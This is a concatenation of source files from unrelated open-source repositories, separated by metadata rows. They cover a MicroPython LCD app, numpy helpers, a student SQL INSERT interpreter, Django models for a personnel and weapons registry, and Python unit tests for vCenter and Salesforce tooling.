lcd.init()
lcd.rotation(2) # Rotate the lcd 180deg
def test_irq(gpio, pin_num=None):
value = gpio.value()
state = "released" if value else "pressed"
print("key", gpio, state)
global app, key1, key2
if gpio is key2:
app.on_top_button_changed(state)
fm.register(board_info.BUTTON_A, fm.fpioa.GPIOHS21)
fm.register(board_info.BUTTON_B, fm.fpioa.GPIOHS22)
# fm.register(board_info.BUTTON_A, fm.fpioa.GPIOHS21, force=True)
key1=GPIO(GPIO.GPIOHS21, GPIO.IN, GPIO.PULL_UP)
key2=GPIO(GPIO.GPIOHS22, GPIO.IN, GPIO.PULL_UP)
key1.irq(test_irq, GPIO.IRQ_BOTH, GPIO.WAKEUP_NOT_SUPPORT, 7)
key2.irq(test_irq, GPIO.IRQ_BOTH, GPIO.WAKEUP_NOT_SUPPORT, 7)
app = ExplorerApp()
while True:
if app.is_dirty:
app.on_draw()
time.sleep_ms(1)
else:
time.sleep_ms(100)
| 31.478632 | 76 | 0.587293 | [
"Apache-2.0"
] | eggfly/M5StickVComputer | others/explorer_standalone.py | 3,683 | Python |
import numpy as np
def log_sum_exp(x, axis=-1):
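    # Numerically stable log(sum(exp(x))) along `axis`: subtracting the
    # per-axis max before exponentiating avoids overflow.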
a = x.max(axis=axis, keepdims=True)
out = a + np.log(np.sum(np.exp(x - a), axis=axis, keepdims=True))
return np.squeeze(out, axis=axis)
def kl_normal(qm, qv, pm, pv):
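    # KL divergence KL(N(qm, diag(qv)) || N(pm, diag(pv))) between diagonal
    # Gaussians, summed over the last axis.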
return 0.5 * np.sum(np.log(pv) - np.log(qv) + qv/pv +
np.square(qm - pm) / pv - 1, axis=-1)
def convert_to_ssl(x, y, n_labels, n_classes, complement=False):
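    # Draws a class-balanced labeled subset (n_labels/n_classes examples per
    # class) for semi-supervised learning; returns (x_label, y_label, x_rest,
    # y_rest), where the rest is either the full data or, with
    # complement=True, only the unselected examples.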
if y.shape[-1] == n_classes:
y_sparse = y.argmax(1)
else:
y_sparse = y
x_label, y_label = [], []
if complement:
x_comp, y_comp = [], []
for i in xrange(n_classes):
idx = y_sparse == i
x_cand, y_cand = x[idx], y[idx]
idx = np.random.choice(len(x_cand), n_labels/n_classes, replace=False)
x_select, y_select = x_cand[idx], y_cand[idx]
x_label += [x_select]
y_label += [y_select]
if complement:
x_select, y_select = np.delete(x_cand, idx, 0), np.delete(y_cand, idx, 0)
x_comp += [x_select]
y_comp += [y_select]
x_label = np.concatenate(x_label, axis=0)
y_label = np.concatenate(y_label, axis=0)
if complement:
x_comp = np.concatenate(x_comp, axis=0)
y_comp = np.concatenate(y_comp, axis=0)
return x_label, y_label, x_comp, y_comp
else:
return x_label, y_label, x, y
def conv_shape(x, k, s, p, ceil=True):
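    # Output length of a convolution along one dimension, e.g.
    # conv_shape(28, 3, 2, 'SAME') -> 14 and conv_shape(28, 3, 2, 'VALID') -> 13.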
if p == 'SAME':
output = float(x) / float(s)
elif p == 'VALID':
output = float(x - k + 1) / float(s)
else:
raise Exception('Unknown padding type')
if ceil:
return int(np.ceil(output))
else:
assert output.is_integer(), 'Does not satisfy conv int requirement'
return int(output)
def conv_shape_list(x, ksp_list, ceil=True):
x_list = [x]
for k, s, p in ksp_list:
x_list.append(conv_shape(x_list[-1], k, s, p, ceil))
return x_list
def split(arr, size):
for i in range(0, len(arr), size):
yield arr[i:i + size]
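# Context manager that temporarily seeds numpy's RNG and restores the previous
# state on exit. A minimal usage sketch:
#   with FixedSeed(0):
#       x = np.random.rand(3)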
class FixedSeed:
def __init__(self, seed):
self.seed = seed
self.state = None
def __enter__(self):
self.state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.state)
| 31.202703 | 85 | 0.585535 | [
"MIT"
] | Hirokazu-Narui/tensorbayes | tensorbayes/nputils.py | 2,309 | Python |
from tytus.parser.team21.Analisis_Ascendente.Instrucciones.Expresiones.Expresion import Expresion
from tytus.parser.team21.Analisis_Ascendente.Instrucciones.expresion import Primitivo
from tytus.parser.team21.Analisis_Ascendente.Instrucciones.instruccion import Instruccion
from tytus.parser.team21.Analisis_Ascendente.storageManager.jsonMode import *
import tytus.parser.team21.Analisis_Ascendente.Tabla_simbolos.TablaSimbolos as TS
from datetime import date,datetime
todoBien = True
#INSERT INTO
class InsertInto(Instruccion):
def __init__(self,caso, id, listaId, values,fila,columna):
self.caso=caso
self.id = id
self.listaId = listaId
self.values = values
self.fila = fila
self.columna = columna
def ejecutar(insertinto,ts,consola,exceptions):
if ts.validar_sim("usedatabase1234") == 1:
            # name of the database
bdactual = ts.buscar_sim("usedatabase1234")
            # look up the symbol and request the database's environment
BD = ts.buscar_sim(bdactual.valor)
entornoBD = BD.Entorno
dataainsertar =[]
if entornoBD.validar_sim(insertinto.id) == 1:
simbolo_tabla = entornoBD.buscar_sim(insertinto.id)
entornoTabla = simbolo_tabla.Entorno
indices_a_buscar=[]
if insertinto.caso==1:
print("caso1")
for data in insertinto.listaId:
contador = 1
for columna in entornoTabla.simbolos:
if data.id == columna:
indices_a_buscar.append(contador)
break
contador=contador+1
print(indices_a_buscar)
lista = entornoTabla.simbolos
contador = 1
for columna in lista:
if not contador in indices_a_buscar:
print("((((((((((((((((((((((((((((((((((((((")
if "NOTNULL" in lista.get(columna).valor:
global todoBien
todoBien = False
consola.append(f"Error esta columna no puede ser nula {columna}")
break
else:
todoBien = True
contador=contador+1
for data in insertinto.listaId:
if entornoTabla.validar_sim(data.id)==-1:
consola.append(f"Error no hay coincidencia de ids en {data.id}")
todoBien = False
for data in insertinto.values:
print("val :",data.valor)
if todoBien:
contadoraux= 1
i = 0
todobien = True
for data in entornoTabla.simbolos:
if contadoraux in indices_a_buscar:
todobien = comprobar_tipos(dataainsertar, i, insertinto.values, data, entornoTabla.simbolos,
entornoTabla, consola, exceptions, BD, simbolo_tabla,ts)
i = i + 1
else:
dataainsertar.append(str(None))
if not todobien:
consola.append("No se insertaron los datos, columnas inconsistentes")
todobien = False
break
contadoraux =contadoraux+1
if todobien:
insert(BD.id, simbolo_tabla.id, dataainsertar)
consola.append(f"insert en la tabla {insertinto.id}, exitoso\n")
else:
consola.append(f"Campos insconsistentes")
consola.append(f"insert en la tabla {insertinto.id}, exitoso\n")
else:
consola.append(f"datos dectectados como no nulos")
todoBien=True
else:
print("caso 2")
if len(insertinto.values) == len(entornoTabla.simbolos):
i =0
todobien = True
for data in entornoTabla.simbolos:
todobien = comprobar_tipos(dataainsertar,i,insertinto.values,data,entornoTabla.simbolos,entornoTabla,consola,exceptions,BD,simbolo_tabla,ts)
if not todobien:
consola.append("No se insertaron los datos, columnas inconsistentes")
todobien= False
break
i=i+1
if todobien:
insert(BD.id,simbolo_tabla.id,dataainsertar)
consola.append(f"insert en la tabla {insertinto.id}, exitoso\n")
else:
consola.append(f"Campos insconsistentes")
else:
consola.append(f"La cantidad de columnas esperadas es de {len(entornoTabla.simbolos)} para insersar en tabla {insertinto.id}")
exceptions.append(f"Error semantico-22023-invalid_parameter_value -{insertinto.fila}-{insertinto.columna}")
else:
consola.append(f"42P01 undefined_table, no existe la tabla {insertinto.id}")
exceptions.append(f"Error semantico-42P01- 42P01 undefined_table, no existe la tabla {insertinto.id}-fila-columna")
else:
consola.append("42P12 invalid_database_definition, Error al insertar\n")
consola.append("22005 error_in_assignment, No se ha seleccionado una BD\n")
exceptions.append("Error semantico-22005 error_in_assignment-No se ha seleccionado DB-fila-columna")
def comprobar_tipos(datainsertar,index,lista_valores,campo,lista_tabla,ts,Consola,exception,bd,tabla,globall):
print("estoy aqui !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
todobien = False
# print(lista_valores[index].valor)
# print(date.fromisoformat(lista_valores[index].valor))
# print(isinstance(date.fromisoformat(lista_valores[index].valor),date))
# print('DATE' in str(lista_tabla.get(campo).tipo).upper())
datafinal = None
if isinstance(lista_valores[index],Instruccion):
datafinal = Expresion.Resolver(lista_valores[index],ts,Consola,exception)
datainsertar.append(datafinal)
else:
datafinal = lista_valores[index].valor
datainsertar.append(datafinal)
print(datafinal)
if isinstance(datafinal,int) and 'INTEGER' in str(lista_tabla.get(campo).tipo).upper():
todobien = True
todobien = comprobarcheck(lista_tabla.get(campo).Entorno,1,datafinal,lista_tabla.get(campo).id,ts,Consola,exception)
todobien = comprobar_caracteristicas(lista_tabla.get(campo).valor,datafinal,Consola,exception,bd,tabla,index)
elif isinstance(datafinal,float) and 'DOUBLE' in str(lista_tabla.get(campo).tipo).upper() or 'DECIMAL' in str(lista_tabla.get(campo).tipo).upper():
todobien = True
todobien = comprobarcheck(lista_tabla.get(campo).Entorno,1,datafinal,lista_tabla.get(campo).id,ts,Consola,exception)
todobien = comprobar_caracteristicas(lista_tabla.get(campo).valor, datafinal, Consola, exception, bd, tabla, index)
elif str(datafinal).upper() == 'TRUE' or str(datafinal).upper() == 'FALSE' and 'BOOLEAN' in str(lista_tabla.get(campo).tipo).upper():
todobien = True
todobien = comprobarcheck(lista_tabla.get(campo).Entorno,1,datafinal,lista_tabla.get(campo).id,ts,Consola,exception)
todobien = comprobar_caracteristicas(lista_tabla.get(campo).valor, datafinal, Consola, exception, bd, tabla,
index)
elif isinstance(datafinal,str) and 'TEXT' in str(lista_tabla.get(campo).tipo).upper():
todobien = True
todobien = comprobarcheck(lista_tabla.get(campo).Entorno,1,datafinal,lista_tabla.get(campo).id,ts,Consola,exception)
todobien = comprobar_caracteristicas(lista_tabla.get(campo).valor, datafinal, Consola, exception, bd, tabla,
index)
elif isinstance(str(datafinal),str) and 'VARCHAR' in str(lista_tabla.get(campo).tipo).upper() or 'CHARACTERVARYING' in str(lista_tabla.get(campo).tipo).upper() or 'CHARACTER' in str(lista_tabla.get(campo).tipo).upper() or 'CHAR' in str(lista_tabla.get(campo).tipo).upper():
todobien = True
cantidad = str(lista_tabla.get(campo).tipo).split("-")[1]
if len(str(datafinal)) <= int(cantidad):
todobien = True
todobien = comprobarcheck(lista_tabla.get(campo).Entorno,1,str(datafinal),lista_tabla.get(campo).id,ts,Consola,exception)
todobien = comprobar_caracteristicas(lista_tabla.get(campo).valor, datafinal, Consola, exception, bd, tabla,
index)
else:
todobien = False
elif isinstance(datafinal,float) and 'MONEY' in str(lista_tabla.get(campo).tipo).upper():
todobien = True
todobien = comprobarcheck(lista_tabla.get(campo).Entorno,1,datafinal,lista_tabla.get(campo).id,ts,Consola,exception)
todobien = comprobar_caracteristicas(lista_tabla.get(campo).valor, datafinal, Consola, exception, bd, tabla,
index)
elif isinstance(datafinal,int) and 'MONEY' in str(lista_tabla.get(campo).tipo).upper():
todobien = True
try:
todobien = comprobarcheck(lista_tabla.get(campo).Entorno,1,datafinal,lista_tabla.get(campo).id,ts,Consola,exception)
todobien = comprobar_caracteristicas(lista_tabla.get(campo).valor, datafinal, Consola, exception, bd, tabla,
index)
except:
todobien = False
elif 'DATE' in str(lista_tabla.get(campo).tipo).upper():
try:
#todobien= isinstance(date.fromisoformat(str(datafinal)), date)
todobien = comprobarcheck(lista_tabla.get(campo).Entorno, 1, datafinal, lista_tabla.get(campo).id, ts,Consola, exception)
todobien = comprobar_caracteristicas(lista_tabla.get(campo).valor, datafinal, Consola, exception, bd,
tabla, index)
except:
print("error de tipo")
todobien = False
else:
try:
print("%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%5")
print(lista_tabla.get(campo).tipo)
for data in globall.simbolos:
print(":: ",data)
if globall.validar_sim(str(lista_tabla.get(campo).tipo).lower()) == 1:
print("$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$4")
for data in ts.simbolos:
print(";;; ",data)
simbolo_enumo = globall.buscar_sim(str(lista_tabla.get(campo).tipo).lower())
if datafinal in simbolo_enumo.valor:
todobien = True
Consola.append("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!11")
else:
print("no encotrado")
except:
todobien= False
return todobien
def comprobarcheck(expresion,data,valor,nombre_columna,ts,Consola,exception):
valor_retorno=True
print("que pedo",data)
#if data == 1:
print("-> ",expresion)
if expresion != None:
for datos in expresion:
dataiz = datos.iz
datade = datos.dr
operador= datos.operador
if nombre_columna != dataiz.id:
valor_retorno=False
break
valor_retorno = Expresion.Resolver(Expresion(Primitivo(valor,1,1),datade,operador,1,1),ts,Consola,exception)
return valor_retorno
def comprobar_caracteristicas(tipo_caracteristica,data,Consola,Exception,nombre_bd,nombre_tabla,posicion):
devolver=True
print("->>>>>",tipo_caracteristica)
if tipo_caracteristica != None:
print("aqui estamos")
for caracteristica in tipo_caracteristica:
print(caracteristica)
if "NOTNULL" in str(caracteristica):
if data == None:
Consola.append("Dato encontrado con not null, debe llevar un valor")
devolver=False
break
elif "UNIQUE" in str(caracteristica) or "PRIMARYKEY" in str(caracteristica):
print(nombre_bd.id,nombre_tabla.id)
datas = extractTable(nombre_bd.id,nombre_tabla.id)
print("unique or primary -> ",posicion)
for fila in datas:
if str(fila[posicion])== str(data):
devolver= False
Consola.append("Constraint unique active")
print(fila[posicion])
print(data)
return devolver | 44.622517 | 277 | 0.557955 | [
"MIT"
] | 201503484/tytus | parser/team21/Analisis_Ascendente/Instrucciones/Insert/insert.py | 13,476 | Python |
import pytest
from vnc_api import vnc_api
from cvfm import services
@pytest.fixture
def dvs_service(vcenter_api_client, vnc_api_client, database):
return services.DistributedVirtualSwitchService(
vcenter_api_client, vnc_api_client, database
)
@pytest.fixture
def port_1():
port = vnc_api.Port("port-1")
esxi_port_info = vnc_api.ESXIProperties(dvs_name="dvs-1")
port.set_esxi_port_info(esxi_port_info)
return port
@pytest.fixture
def port_2():
port = vnc_api.Port("port-2")
esxi_port_info = vnc_api.ESXIProperties(dvs_name="dvs-2")
port.set_esxi_port_info(esxi_port_info)
return port
@pytest.fixture
def port_3():
port = vnc_api.Port("port-2")
esxi_port_info = vnc_api.ESXIProperties()
port.set_esxi_port_info(esxi_port_info)
return port
@pytest.fixture
def port_4():
return vnc_api.Port("port-4")
def test_populate_db(
dvs_service, database, vnc_api_client, port_1, port_2, port_3, port_4
):
database.clear_database()
ports = [port_1, port_2, port_3, port_4]
json_ports = [
port.serialize_to_json(field_names="esxi_port_info") for port in ports
]
for port in json_ports:
if port.get("esxi_port_info"):
port["esxi_port_info"] = port["esxi_port_info"].exportDict(
name_=None
)
vnc_api_client.read_all_ports.return_value = json_ports
dvs_service.populate_db_with_supported_dvses()
assert database.is_dvs_supported("dvs-1") is True
assert database.is_dvs_supported("dvs-2") is True
assert database.is_dvs_supported("dvs-3") is False
| 24.830769 | 78 | 0.715613 | [
"Apache-2.0"
] | atsgen/tf-vcenter-fabric-manager | tests/unit/services/test_dvs_service.py | 1,614 | Python |
from django.db import models
from osoba.models import ServiseID, Company
from django.utils.translation import gettext as _
class SHPK(models.Model):
name = models.CharField(max_length=512, verbose_name=_('Name'))
short_name = models.CharField(max_length=512, verbose_name=_('Short name'))
def __str__(self):
return self.name[:50]
class Meta:
verbose_name = _('SHPK')
verbose_name_plural = _('SHPK')
class ZvannyaName(models.Model):
zv_id = models.AutoField(primary_key=True)
zv_name = models.TextField()
zv_short_name = models.CharField(max_length=20)
def __str__(self):
return '{}__{}'.format(self.zv_id, self.zv_name)
class Meta:
managed = False
db_table = 'zvannya_name'
class Staff(models.Model):
    # Staffing table (shtatka)
    # ordinal number in the staffing table
unicum = models.PositiveBigIntegerField(verbose_name= _('Unic number'), blank=True)
company = models.ForeignKey(Company, on_delete=models.CASCADE, blank=True, verbose_name= _('Company'))
name = models.CharField(max_length=512, verbose_name=_('Name'))
shpk = models.ForeignKey(SHPK, on_delete=models.CASCADE, blank=True, verbose_name= _('shpk'))
ocoba = models.ForeignKey(ServiseID, on_delete=models.CASCADE, blank=True, verbose_name= _('ocoba'), null=True)
vos = models.CharField(max_length=512, verbose_name= _('VOS'))
poz = models.CharField(max_length=512, verbose_name= _('pozyvnyy'), blank=True)
salary = models.PositiveBigIntegerField(verbose_name= _('salary'), blank=True)
tariff_category = models.PositiveBigIntegerField(verbose_name= _('tariff category'), blank=True)
vacant = models.BooleanField(verbose_name= _('Vacant'), blank=True, null=True, default=True)
def __str__(self):
return self.name[:50]
class Meta:
verbose_name = _('Staff')
verbose_name_plural = _('Staff')
class Adresa(models.Model):
adr_id = models.AutoField(primary_key=True)
adr_n_id = models.IntegerField()
adresa = models.CharField(max_length=360)
class Meta:
managed = False
db_table = 'adresa'
class Nakaz(models.Model):
nak_id = models.AutoField(primary_key=True)
nak_n_id = models.IntegerField()
nak_status_id = models.IntegerField()
zvidky = models.IntegerField()
kudy = models.IntegerField()
nak_data = models.DateField( blank=True, null=True)
nak_nomer = models.IntegerField()
povern = models.DateField( blank=True, null=True)
tmp = models.IntegerField()
class Meta:
managed = False
db_table = 'nakaz'
class NakazNomer(models.Model):
n_nak_id = models.AutoField(primary_key=True)
n_nak_data = models.DateField( blank=True, null=True)
n_nak_nomer = models.IntegerField()
class Meta:
managed = False
db_table = 'nakaz_nomer'
class NakazPlace(models.Model):
nak_place_id = models.AutoField(primary_key=True)
nak_place_name = models.CharField(max_length=120)
class Meta:
managed = False
db_table = 'nakaz_place'
class PosadaName(models.Model):
pos_id = models.AutoField(primary_key=True)
pos_name = models.TextField()
def __str__(self):
return '{}__{}'.format(self.pos_id, self.pos_name[:50])
class Meta:
managed = False
db_table = 'posada_name'
class PidrozdilName(models.Model):
p_id = models.AutoField(primary_key=True)
por_nomer = models.IntegerField()
p_name = models.TextField()
p_short_name = models.CharField(max_length=32)
p_full_name = models.CharField(max_length=200)
active = models.IntegerField()
def __str__(self):
return '{}__{}'.format(self.p_id, self.p_name[:50])
class Meta:
managed = False
db_table = 'pidrozdil_name'
class Shtatka(models.Model):
pos_id = models.AutoField(primary_key=True)
p = models.ForeignKey(PidrozdilName, to_field='p_id', on_delete=models.PROTECT, related_name='+' )
sh = models.ForeignKey(PosadaName, to_field='pos_id', on_delete=models.PROTECT, related_name='+' )
zv_sh = models.ForeignKey(ZvannyaName, to_field='zv_id', on_delete=models.PROTECT, related_name='+' )
dopusk = models.CharField(max_length=1)
vos = models.CharField(max_length=12)
oklad = models.CharField(max_length=12)
vidsotok = models.IntegerField()
nomer_kniga = models.IntegerField()
class Meta:
managed = False
db_table = 'shtatka'
def __str__(self):
return '{}__{}'.format(self.pos_id, self.sh)
class OsvitaName(models.Model):
osv_name_id = models.AutoField(primary_key=True)
osv_name = models.CharField(max_length=100)
def __str__(self):
return '{}__{}'.format(self.osv_name_id, self.osv_name)
class Meta:
managed = False
db_table = 'osvita_name'
class SimStanName(models.Model):
s_stan_name_id = models.AutoField(primary_key=True)
s_stan_name = models.CharField(max_length=30)
def __str__(self):
return '{}__{}'.format(self.s_stan_name_id, self.s_stan_name)
class Meta:
managed = False
db_table = 'sim_stan_name'
class StatsName(models.Model):
s_stats_name_id = models.AutoField(primary_key=True)
s_stats_name = models.CharField(max_length=1)
def __str__(self):
return '{}__{}'.format(self.s_stats_name_id, self.s_stats_name)
class Meta:
managed = False
db_table = 'stats_name'
class StatusName(models.Model):
s_id = models.AutoField(primary_key=True)
s_name = models.CharField(max_length=128)
def __str__(self):
return '{}__{}'.format(self.s_id, self.s_name)
class Meta:
managed = False
db_table = 'status_name'
class Name(models.Model):
n_id= models.AutoField(primary_key=True)
name = models.TextField()
short_name = models.TextField()
pseudo = models.CharField(max_length=128)
zv = models.ForeignKey(ZvannyaName, to_field='zv_id', on_delete=models.PROTECT, related_name='+' )
data_zv = models.CharField(max_length=100)
pos = models.ForeignKey(Shtatka, to_field='pos_id', on_delete=models.PROTECT, related_name='+' )
pos_id_old = models.IntegerField(null=True, blank=True)
p_id = models.IntegerField() #wtf?
kontr = models.IntegerField(null=True, blank=True)
data_narod = models.DateField( blank=True, null=True)
adresa_nar = models.CharField(max_length=200)
data_mob = models.DateField( blank=True, null=True)
vijskomat = models.CharField(max_length=100)
data_zarah = models.DateField( blank=True, null=True)
nomer_nakazu_ok = models.CharField(max_length=10)
data_nakazu_ok = models.DateField( blank=True, null=True)
chiy_nakaz = models.CharField(max_length=50)
kontrakt = models.DateField( blank=True, null=True)
kontrakt_strok = models.CharField(max_length=50)
kontrakt_zak = models.DateField( blank=True, null=True)
nomer_nakazu = models.IntegerField()#wtf?
data_zviln = models.DateField( blank=True, null=True)
nomer_nakazu_zviln = models.IntegerField()#wtf?
nomer_pasp = models.CharField(max_length=100)
code_nomer = models.CharField(max_length=10)
voen_nomer = models.CharField(max_length=25)
grupa_krovi = models.CharField(max_length=15)
osvita = models.ForeignKey(OsvitaName, to_field='osv_name_id', on_delete=models.PROTECT, related_name='+' )
specialnist = models.CharField(max_length=500)
zvp = models.CharField(max_length=100)
fahova = models.CharField(max_length=100)
liderstvo = models.CharField(max_length=100)
perem = models.CharField(max_length=50)
persh_kontr = models.CharField(max_length=50)
ozdor = models.CharField(max_length=50)
mdspp = models.CharField(max_length=50)
sim_stan = models.ForeignKey(SimStanName, to_field='s_stan_name_id', on_delete=models.PROTECT, related_name='+' )
stats = models.ForeignKey(StatsName, to_field='s_stats_name_id', on_delete=models.PROTECT, related_name='+' )
status = models.ForeignKey(StatusName, to_field='s_id', on_delete=models.PROTECT, related_name='+' )
status2 = models.IntegerField()
notes = models.TextField()
notes1 = models.TextField()
def __str__(self):
return self.name[:50]
class Meta:
managed = False
db_table = 'name'
class Peremish(models.Model):
perem_id = models.AutoField(primary_key=True)
perem_n_id = models.IntegerField()
perem_status_id = models.IntegerField()
zvidky = models.IntegerField()
kudy = models.IntegerField()
perem_data = models.DateField( blank=True, null=True)
nakaz_id = models.IntegerField()
povern = models.DateField( blank=True, null=True)
class Meta:
managed = False
db_table = 'peremish'
class Phones(models.Model):
ph_id = models.AutoField(primary_key=True)
n_id = models.IntegerField()
ph_nomer = models.TextField()
class Meta:
managed = False
db_table = 'phones'
class PidrozdilId(models.Model):
p_id = models.AutoField(primary_key=True)
p_parent_id = models.IntegerField()
isparent = models.IntegerField()
class Meta:
managed = False
db_table = 'pidrozdil_id'
class Priznach(models.Model):
prizn_id = models.AutoField(primary_key=True)
prizn_n_id = models.IntegerField()
prizn_data = models.DateField( blank=True, null=True)
prizn_pos_id = models.IntegerField()
class Meta:
managed = False
db_table = 'priznach'
class PriznachOld(models.Model):
prizn_id = models.AutoField(primary_key=True)
prizn_n_id = models.IntegerField()
prizn_data = models.DateField( blank=True, null=True)
prizn_pos_id = models.IntegerField()
class Meta:
managed = False
db_table = 'priznach_old'
class PriznachOld2(models.Model):
prizn_id = models.AutoField(primary_key=True)
prizn_n_id = models.IntegerField()
prizn_data = models.DateField( blank=True, null=True)
prizn_pos_id = models.IntegerField()
class Meta:
managed = False
db_table = 'priznach_old_2'
class Ridny(models.Model):
rid_id = models.AutoField(primary_key=True)
rid_n_id = models.IntegerField()
rid_name_id = models.IntegerField()
rid_name = models.CharField(max_length=200)
rid_data_nar = models.DateField( blank=True, null=True)
rid_phone = models.IntegerField()
rid_notes = models.CharField(max_length=500)
class Meta:
managed = False
db_table = 'ridny'
class RidnyName(models.Model):
rid_name_id = models.AutoField(primary_key=True)
rid_name_name = models.CharField(max_length=50)
class Meta:
managed = False
db_table = 'ridny_name'
class ShtatkaOld(models.Model):
pos_id = models.AutoField(primary_key=True)
p_id = models.IntegerField()
sh_id = models.IntegerField()
zv_sh_id = models.IntegerField()
vos = models.CharField(max_length=12)
oklad = models.CharField(max_length=12)
nomer_kniga = models.IntegerField()
class Meta:
managed = False
db_table = 'shtatka_old'
class ShtatkaOld2(models.Model):
pos_id = models.AutoField(primary_key=True)
p_id = models.IntegerField()
sh_id = models.IntegerField()
zv_sh_id = models.IntegerField()
vos = models.CharField(max_length=12)
oklad = models.CharField(max_length=12)
nomer_kniga = models.IntegerField()
class Meta:
managed = False
db_table = 'shtatka_old_2'
class Table32(models.Model):
col_1 = models.CharField(db_column='COL 1', max_length=10, blank=True, null=True) # Field name made lowercase. Field renamed to remove unsuitable characters.
col_2 = models.IntegerField(db_column='COL 2', blank=True, null=True) # Field name made lowercase. Field renamed to remove unsuitable characters.
class Meta:
managed = False
db_table = 'table 32'
class Table35(models.Model):
col_1 = models.CharField(db_column='COL 1', max_length=10, blank=True, null=True) # Field name made lowercase. Field renamed to remove unsuitable characters.
col_2 = models.IntegerField(db_column='COL 2', blank=True, null=True) # Field name made lowercase. Field renamed to remove unsuitable characters.
class Meta:
managed = False
db_table = 'table 35'
class Temp(models.Model):
number_1 = models.IntegerField(db_column='1') # Field renamed because it wasn't a valid Python identifier.
number_2 = models.TextField(db_column='2') # Field renamed because it wasn't a valid Python identifier.
class Meta:
managed = False
db_table = 'temp'
class Tmp(models.Model):
number_1 = models.IntegerField(db_column='1') # Field renamed because it wasn't a valid Python identifier.
number_2 = models.TextField(db_column='2') # Field renamed because it wasn't a valid Python identifier.
class Meta:
managed = False
db_table = 'tmp'
class Vysluga(models.Model):
vys_id = models.AutoField(primary_key=True)
vys_n_id = models.IntegerField()
vys_data_mob = models.DateField( blank=True, null=True)
vys_data_zvil = models.DateField( blank=True, null=True)
class Meta:
managed = False
db_table = 'vysluga'
class VyslugaNormy(models.Model):
rokiv = models.IntegerField()
nadbavka = models.IntegerField()
class Meta:
managed = False
db_table = 'vysluga_normy'
class VyslugaZv(models.Model):
vys_zv_id = models.AutoField(primary_key=True)
vys_zv_n_id = models.IntegerField()
data_zv = models.DateField( blank=True, null=True)
class Meta:
managed = False
db_table = 'vysluga_zv'
class ZbrStatusName(models.Model):
zbr_status_id = models.AutoField(primary_key=True)
zbr_status_name = models.CharField(max_length=20)
class Meta:
managed = False
db_table = 'zbr_status_name'
class Zbroya(models.Model):
zbr_id = models.AutoField(primary_key=True)
zbr_type = models.IntegerField()
nomer = models.CharField(max_length=128)
n_id = models.IntegerField()
magazin = models.IntegerField()
zbr_status = models.IntegerField()
zbr_note = models.CharField(max_length=256)
class Meta:
managed = False
db_table = 'zbroya'
class ZbroyaAll(models.Model):
zbr_type = models.IntegerField()
nomer = models.CharField(max_length=128)
rota = models.IntegerField()
class Meta:
managed = False
db_table = 'zbroya_all'
class ZbroyaName(models.Model):
zbr_id = models.AutoField(primary_key=True)
zbr_name = models.CharField(max_length=128)
class Meta:
managed = False
db_table = 'zbroya_name'
class ZbroyaSklad(models.Model):
zbr_type = models.IntegerField()
nomer = models.CharField(max_length=256)
class Meta:
managed = False
db_table = 'zbroya_sklad'
class ZvGrupaName(models.Model):
zv_gr_id = models.AutoField(primary_key=True)
zv_gr_name = models.CharField(max_length=20)
class Meta:
managed = False
db_table = 'zv_grupa_name'
class ZvannyaId(models.Model):
zv_id = models.IntegerField(unique=True)
zv_gr_id = models.IntegerField()
zv_okl = models.IntegerField()
class Meta:
managed = False
db_table = 'zvannya_id'
class ZvilnComent(models.Model):
zv_com_id = models.AutoField(primary_key=True)
zv_com_n_id = models.IntegerField()
zv_coment = models.CharField(max_length=500)
class Meta:
managed = False
db_table = 'zviln_coment'
class Kontrakt(models.Model):
kontrakt_com_id = models.AutoField(primary_key=True)
    kontrakt_com_n = models.ForeignKey(Name, to_field='n_id', on_delete=models.PROTECT, related_name='+')  # models.IntegerField()
    kontrakt_date = models.DateField(blank=True, null=True)
    kontrakt_srok = models.IntegerField()
    kontrakt_zak = models.DateField(blank=True, null=True)
class Meta:
managed = False
db_table = 'kontrakt'
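# Illustrative usage sketch (not part of the generated models): these unmanaged
# models are queried through the Django ORM like any other model, e.g.
#   Zbroya.objects.filter(zbr_status=1).count()
#   Kontrakt.objects.select_related('kontrakt_com_n').order_by('kontrakt_date')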
| 30.308851 | 162 | 0.692929 | [
"Apache-2.0"
] | VadymRud/zampol | zampol/staff/models.py | 16,122 | Python |
import unittest
from mock import Mock, patch
from cumulusci.salesforce_api.utils import get_simple_salesforce_connection
from cumulusci.core.exceptions import ServiceNotConfigured
from cumulusci import __version__
class TestSalesforceApiUtils(unittest.TestCase):
@patch("simple_salesforce.Salesforce")
def test_connection(self, mock_sf):
org_config = Mock()
proj_config = Mock()
service_mock = Mock()
service_mock.client_id = "TEST"
proj_config.keychain.get_service.return_value = service_mock
get_simple_salesforce_connection(proj_config, org_config)
mock_sf.assert_called_once_with(
instance_url=org_config.instance_url,
session_id=org_config.access_token,
version=proj_config.project__package__api_version,
)
mock_sf.return_value.headers.setdefault.assert_called_once_with(
"Sforce-Call-Options", "client={}".format(service_mock.client_id)
)
@patch("simple_salesforce.Salesforce")
def test_connection__explicit_api_version(self, mock_sf):
org_config = Mock()
proj_config = Mock()
service_mock = Mock()
service_mock.client_id = "TEST"
proj_config.keychain.get_service.return_value = service_mock
get_simple_salesforce_connection(proj_config, org_config, api_version="42.0")
mock_sf.assert_called_once_with(
instance_url=org_config.instance_url,
session_id=org_config.access_token,
version="42.0",
)
mock_sf.return_value.headers.setdefault.assert_called_once_with(
"Sforce-Call-Options", "client={}".format(service_mock.client_id)
)
@patch("simple_salesforce.Salesforce")
def test_connection__no_connected_app(self, mock_sf):
org_config = Mock()
proj_config = Mock()
proj_config.keychain.get_service.side_effect = ServiceNotConfigured
get_simple_salesforce_connection(proj_config, org_config)
mock_sf.return_value.headers.setdefault.assert_called_once_with(
"Sforce-Call-Options",
"client={}".format("CumulusCI/{}".format(__version__)),
)
| 37.322034 | 85 | 0.702997 | [
"BSD-3-Clause"
] | bethbrains/CumulusCI | cumulusci/salesforce_api/tests/test_utils.py | 2,202 | Python |
# -*- coding: utf-8 -*-
"""Define general test helper attributes and utilities."""
import os
import sys
TRAVIS = os.getenv("TRAVIS_PYTHON_VERSION") is not None
